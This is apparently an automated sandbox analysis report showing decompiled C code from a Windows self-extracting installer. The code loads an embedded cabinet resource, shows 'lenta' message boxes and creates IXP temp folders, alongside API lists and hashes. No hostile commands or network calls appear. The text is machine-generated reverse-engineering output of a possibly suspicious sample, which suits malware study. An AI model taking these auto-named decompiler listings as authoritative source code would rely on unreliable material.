                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00024FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t9;
                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t27;
                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t36 = "CABINET";
                                                                                                                                                                                                                                                				 *0x29144 = E0002468F(_t36, 0, 0);
                                                                                                                                                                                                                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                                				 *0x29140 = _t8;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					return _t8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t9 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem( *0x28584, 0x841), 5); // executed
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t10 = E00024EFD(0, 0); // executed
                                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                                					__imp__#20(E00024CA0, E00024CC0, E00024980, E00024A50, E00024AD0, E00024B60, E00024BC0, 1, 0x29148, _t33);
                                                                                                                                                                                                                                                					_t34 = _t10;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						_t29 =  *0x29148; // 0x0
                                                                                                                                                                                                                                                						_t24 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                						E000244B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#22(_t34, "*MEMCAB", 0x21140, 0, E00024CD0, 0, 0x29140); // executed
                                                                                                                                                                                                                                                					_t37 = _t10;
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                					E000244B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_t12 =  *0x29140; // 0x0
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						FreeResource(_t12);
                                                                                                                                                                                                                                                						 *0x29140 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						_t47 =  *0x291d8; // 0x0
                                                                                                                                                                                                                                                						if(_t47 == 0) {
                                                                                                                                                                                                                                                							E000244B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(( *0x28a38 & 0x00000001) == 0 && ( *0x29a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                						SendMessageA( *0x28584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                0x00025107
                                                                                                                                                                                                                                                0x00025107
                                                                                                                                                                                                                                                0x0002510e
                                                                                                                                                                                                                                                0x00025111
                                                                                                                                                                                                                                                0x00025117
                                                                                                                                                                                                                                                0x00025117
                                                                                                                                                                                                                                                0x0002511f
                                                                                                                                                                                                                                                0x00025121
                                                                                                                                                                                                                                                0x00025127
                                                                                                                                                                                                                                                0x00025135
                                                                                                                                                                                                                                                0x00025135
                                                                                                                                                                                                                                                0x00025127
                                                                                                                                                                                                                                                0x00025141
                                                                                                                                                                                                                                                0x00025159
                                                                                                                                                                                                                                                0x00025159
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002515f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00024FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00025006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0002500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00025030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00025037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0002504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00025051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00025111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00025159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 9fd41ff45dcf68608347f161c711508d974aa81d48a34fecc0cbac8853684836
                                                                                                                                                                                                                                                • Instruction ID: 1c3008868e72eedc61d5ba890cbe1824a8fc9aaaed5c743d2782b2092690458e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fd41ff45dcf68608347f161c711508d974aa81d48a34fecc0cbac8853684836
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C13103B0B40731BBF7305B66BCCAF67369CA709756F244024FA05A61E1DEBC8C528A65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 244b9-244f8 407 24679-2467b 406->407 408 244fe-24525 LoadStringA 406->408 411 2467c-2468c call 26ce0 407->411 409 24562-24568 408->409 410 24527-2452e call 2681f 408->410 413 2456b-24570 409->413 420 24530-2453d call 267c9 410->420 421 2453f 410->421 413->413 416 24572-2457c 413->416 418 245c9-245cb 416->418 419 2457e-24580 416->419 424 24607-24617 LocalAlloc 418->424 425 245cd-245cf 418->425 422 24583-24588 419->422 420->421 426 24544-24554 MessageBoxA 420->426 421->426 422->422 429 2458a-2458c 422->429 427 2455a-2455d 424->427 428 2461d-24628 call 21680 424->428 431 245d2-245d7 425->431 426->427 427->411 436 2462d-2463d MessageBeep call 2681f 428->436 433 2458f-24594 429->433 431->431 434 245d9-245ed LocalAlloc 431->434 433->433 437 24596-245ad LocalAlloc 433->437 434->427 435 245f3-24605 call 2171e 434->435 435->436 444 2464e 436->444 445 2463f-2464c call 267c9 436->445 437->427 440 245af-245c7 call 2171e 437->440 440->436 448 24653-24677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000244B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                                                                				void* _v580;
                                                                                                                                                                                                                                                				struct HWND__* _v584;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                				int _t64;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                                                                                                				_t34 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                                				_v584 = __ecx;
                                                                                                                                                                                                                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                                				_t67 = _a4;
                                                                                                                                                                                                                                                				_t69 = 0xd;
                                                                                                                                                                                                                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                                				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                                				_v580 = _t37;
                                                                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                                                                				if(( *0x28a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                					_t39 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_v576 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x29a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                                					if(_v576 != 0) {
                                                                                                                                                                                                                                                						_t73 =  &_v576;
                                                                                                                                                                                                                                                						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                                						_t75 = _t16;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t43 =  *_t73;
                                                                                                                                                                                                                                                							_t73 = _t73 + 1;
                                                                                                                                                                                                                                                						} while (_t43 != 0);
                                                                                                                                                                                                                                                						_t84 = _v580;
                                                                                                                                                                                                                                                						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                                						if(_t84 == 0) {
                                                                                                                                                                                                                                                							if(_t67 == 0) {
                                                                                                                                                                                                                                                								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                                								_t83 = _t27;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t75 = _t83;
                                                                                                                                                                                                                                                									_t74 = _t80;
                                                                                                                                                                                                                                                									E00021680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t76 = _t67;
                                                                                                                                                                                                                                                								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                                								_t85 = _t24;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t55 =  *_t76;
                                                                                                                                                                                                                                                									_t76 = _t76 + 1;
                                                                                                                                                                                                                                                								} while (_t55 != 0);
                                                                                                                                                                                                                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                                								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E0002171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t77 = _t67;
                                                                                                                                                                                                                                                							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                                							_t81 = _t18;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t58 =  *_t77;
                                                                                                                                                                                                                                                								_t77 = _t77 + 1;
                                                                                                                                                                                                                                                							} while (_t58 != 0);
                                                                                                                                                                                                                                                							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                                							_t82 = _t84 + 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t59 =  *_t84;
                                                                                                                                                                                                                                                								_t84 = _t84 + 1;
                                                                                                                                                                                                                                                							} while (_t59 != 0);
                                                                                                                                                                                                                                                							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                                							_t80 = _t44;
                                                                                                                                                                                                                                                							if(_t80 == 0) {
                                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_push(_v580);
                                                                                                                                                                                                                                                								E0002171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                								L23:
                                                                                                                                                                                                                                                								MessageBeep(_a12);
                                                                                                                                                                                                                                                								if(E0002681F(_t67) == 0) {
                                                                                                                                                                                                                                                									L25:
                                                                                                                                                                                                                                                									_t49 = 0x10000;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t54 = E000267C9(_t74, _t74);
                                                                                                                                                                                                                                                									_t49 = 0x190000;
                                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                                								_t83 = _t52;
                                                                                                                                                                                                                                                								LocalFree(_t80);
                                                                                                                                                                                                                                                								_t39 = _t52;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(E0002681F(_t67) == 0) {
                                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                                							_t64 = 0x10010;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t66 = E000267C9(0, 0);
                                                                                                                                                                                                                                                							_t64 = 0x190010;
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x00024578
                                                                                                                                                                                                                                                0x0002457c
                                                                                                                                                                                                                                                0x000245cb
                                                                                                                                                                                                                                                0x00024607
                                                                                                                                                                                                                                                0x00024607
                                                                                                                                                                                                                                                0x0002460d
                                                                                                                                                                                                                                                0x00024613
                                                                                                                                                                                                                                                0x00024617
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002461d
                                                                                                                                                                                                                                                0x00024623
                                                                                                                                                                                                                                                0x00024626
                                                                                                                                                                                                                                                0x00024628
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024628
                                                                                                                                                                                                                                                0x000245cd
                                                                                                                                                                                                                                                0x000245cd
                                                                                                                                                                                                                                                0x000245cf
                                                                                                                                                                                                                                                0x000245cf
                                                                                                                                                                                                                                                0x000245d2
                                                                                                                                                                                                                                                0x000245d2
                                                                                                                                                                                                                                                0x000245d4
                                                                                                                                                                                                                                                0x000245d5
                                                                                                                                                                                                                                                0x000245db
                                                                                                                                                                                                                                                0x000245de
                                                                                                                                                                                                                                                0x000245e3
                                                                                                                                                                                                                                                0x000245e9
                                                                                                                                                                                                                                                0x000245ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000245f3
                                                                                                                                                                                                                                                0x000245fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024602
                                                                                                                                                                                                                                                0x000245ed
                                                                                                                                                                                                                                                0x0002457e
                                                                                                                                                                                                                                                0x0002457e
                                                                                                                                                                                                                                                0x00024580
                                                                                                                                                                                                                                                0x00024580
                                                                                                                                                                                                                                                0x00024583
                                                                                                                                                                                                                                                0x00024583
                                                                                                                                                                                                                                                0x00024585
                                                                                                                                                                                                                                                0x00024586
                                                                                                                                                                                                                                                0x0002458a
                                                                                                                                                                                                                                                0x0002458c
                                                                                                                                                                                                                                                0x0002458f
                                                                                                                                                                                                                                                0x0002458f
                                                                                                                                                                                                                                                0x00024591
                                                                                                                                                                                                                                                0x00024592
                                                                                                                                                                                                                                                0x0002459b
                                                                                                                                                                                                                                                0x0002459e
                                                                                                                                                                                                                                                0x000245a3
                                                                                                                                                                                                                                                0x000245a9
                                                                                                                                                                                                                                                0x000245ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000245af
                                                                                                                                                                                                                                                0x000245af
                                                                                                                                                                                                                                                0x000245bf
                                                                                                                                                                                                                                                0x0002462d
                                                                                                                                                                                                                                                0x00024630
                                                                                                                                                                                                                                                0x0002463d
                                                                                                                                                                                                                                                0x0002464e
                                                                                                                                                                                                                                                0x0002464e
                                                                                                                                                                                                                                                0x0002463f
                                                                                                                                                                                                                                                0x00024640
                                                                                                                                                                                                                                                0x00024647
                                                                                                                                                                                                                                                0x0002464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002464c
                                                                                                                                                                                                                                                0x00024666
                                                                                                                                                                                                                                                0x0002466d
                                                                                                                                                                                                                                                0x0002466f
                                                                                                                                                                                                                                                0x00024675
                                                                                                                                                                                                                                                0x00024675
                                                                                                                                                                                                                                                0x000245ad
                                                                                                                                                                                                                                                0x00024527
                                                                                                                                                                                                                                                0x0002452e
                                                                                                                                                                                                                                                0x0002453f
                                                                                                                                                                                                                                                0x0002453f
                                                                                                                                                                                                                                                0x00024530
                                                                                                                                                                                                                                                0x00024531
                                                                                                                                                                                                                                                0x00024538
                                                                                                                                                                                                                                                0x0002453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002453d
                                                                                                                                                                                                                                                0x00024554
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x0002455a
                                                                                                                                                                                                                                                0x00024525
                                                                                                                                                                                                                                                0x0002468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000245A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000245E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0002460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00024630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00024666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0002466F
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0002686E
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: GetSystemMetrics.USER32(0000004A), ref: 000268A7
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000268CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,?,0000000C), ref: 000268F4
                                                                                                                                                                                                                                                  • Part of subcall function 0002681F: RegCloseKey.ADVAPI32(?), ref: 00026902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000253A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                                				CHAR* _t20;
                                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				CHAR* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                                				_t32 = __edx;
                                                                                                                                                                                                                                                				_t20 = __ecx;
                                                                                                                                                                                                                                                				_t29 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0002171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                                					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                                					_t29 = _t29 + 1;
                                                                                                                                                                                                                                                					E00021680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                                					E0002658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                                					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                                					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t29 < 0x190) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t30 = 0;
                                                                                                                                                                                                                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                                						_t30 = 1;
                                                                                                                                                                                                                                                						DeleteFileA(_t32);
                                                                                                                                                                                                                                                						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return E00026CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t30 = 1;
                                                                                                                                                                                                                                                				 *0x28a20 = 1;
                                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000253FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
